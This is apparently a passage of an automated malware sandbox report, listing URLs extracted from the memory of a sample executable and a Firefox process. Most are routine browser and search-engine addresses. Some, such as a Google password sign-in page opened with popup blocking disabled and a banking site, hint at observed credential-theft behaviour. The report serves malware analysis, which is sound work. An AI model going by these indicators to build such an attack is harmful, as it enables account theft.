Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.2563092645.000002729B1A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000019.00000002.2563092645.000002729B1A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2458618765.000002728E7DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2390907395.000002729486A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000019.00000002.2536047644.0000027294F76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/notifi
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/search
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulmoz-extension://d8c2fff1-cf0b-4e4a-8f0f
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/InlineSpellCheck
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2563092645.000002729B1A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2563092645.000002729B1A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000019.00000002.2492921640.00000272932BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: firefox.exe, 00000019.00000002.2489207640.0000027293091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000019.00000002.2561348786.000002729AF60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2334402547.0000027292B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2334950209.0000027292B73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/_adjustHeightOnPopupShown
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000019.00000002.2561348786.000002729AF2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000019.00000003.2400926046.000002729B163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2423982999.0000027292EBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2542958150.0000027295FA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2487373672.0000027292E7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2535380451.0000027294ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.2456139673.00000272847A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 00000019.00000002.2478820802.000002729133C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2390907395.000002729486A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000019.00000002.2516262256.000002729480A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000019.00000002.2581974745.00001B65AB404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000019.00000002.2492921640.00000272932BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 00000019.00000003.2400926046.000002729B163000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000019.00000003.2396489947.000002729B3B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2455481600.0000027282F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000019.00000002.2563092645.000002729B1D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000019.00000002.2581974745.00001B65AB404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: firefox.exe, 00000019.00000002.2482727507.00000272929D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000019.00000003.2396489947.000002729B352000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2408822675.000002729B352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000019.00000003.2396489947.000002729B352000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2408822675.000002729B352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000019.00000003.2396489947.000002729B352000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2408822675.000002729B352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000019.00000003.2396489947.000002729B352000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2408822675.000002729B352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000019.00000002.2503538213.0000027294003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000019.00000002.2561348786.000002729AF60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000019.00000002.2561348786.000002729AF60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000019.00000003.2407614644.000002729B680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000019.00000003.2407614644.000002729B680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000019.00000003.2396489947.000002729B3A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tilesextensions.pocket.oAuthConsumerKeyGo
Source: firefox.exe, 00000019.00000002.2455481600.0000027282F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000019.00000002.2581974745.00001B65AB404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000019.00000003.2396489947.000002729B3B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2465718967.000002728FD62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2334402547.0000027292B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2334950209.0000027292B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2582142456.00001C4C4A104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.000002729310E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2479828969.0000027292470000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2336750459.0000027292733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481024204.0000027292728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%shttps://poczta.interia
Source: firefox.exe, 00000019.00000002.2581974745.00001B65AB404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2336750459.0000027292733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481024204.0000027292728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2579254717.000002729D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000003.2386448202.0000027293B09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2393247432.0000027293B7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000019.00000003.2393247432.0000027293B7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000019.00000002.2469501678.000002728FEFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2583142865.0000276436404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000019.00000002.2469501678.000002728FEFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.commodificationTime
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2579254717.000002729D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000019.00000002.2550341180.000002729614F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2536047644.0000027294F76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000019.00000002.2550341180.000002729614F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000019.00000003.2380477181.000002729B624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000019.00000002.2550341180.000002729614F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsDevice
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000019.00000002.2473379671.0000027290103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000019.00000002.2569395137.000002729B6E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000019.00000002.2564524805.000002729B219000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000019.00000002.2564524805.000002729B219000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000019.00000003.2334698150.0000027292B57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2479828969.0000027292470000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2334402547.0000027292B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2334950209.0000027292B73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsshims/private-browsing-web-api-fixes.jsshims/google-a
Source: firefox.exe, 00000019.00000003.2396489947.000002729B352000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2408822675.000002729B352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000019.00000003.2396489947.000002729B352000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2408822675.000002729B352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000019.00000002.2581974745.00001B65AB404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000019.00000002.2492921640.00000272932BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000019.00000003.2396489947.000002729B352000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2408822675.000002729B352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000019.00000002.2455481600.0000027282F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2428398466.00000272941A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000019.00000003.2380477181.000002729B624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2579254717.000002729D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitdiscoverystream.hardcoded-basic-layoutresource://activi
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2390907395.000002729486A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000019.00000002.2491386104.0000027293194000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000019.00000002.2580378242.0000038C3EC4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2336750459.0000027292733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481024204.0000027292728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sbrowser.download.viewableInternally.enabledTypesFa
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2336750459.0000027292733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481024204.0000027292728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%sextractScheme/fixupChangedP
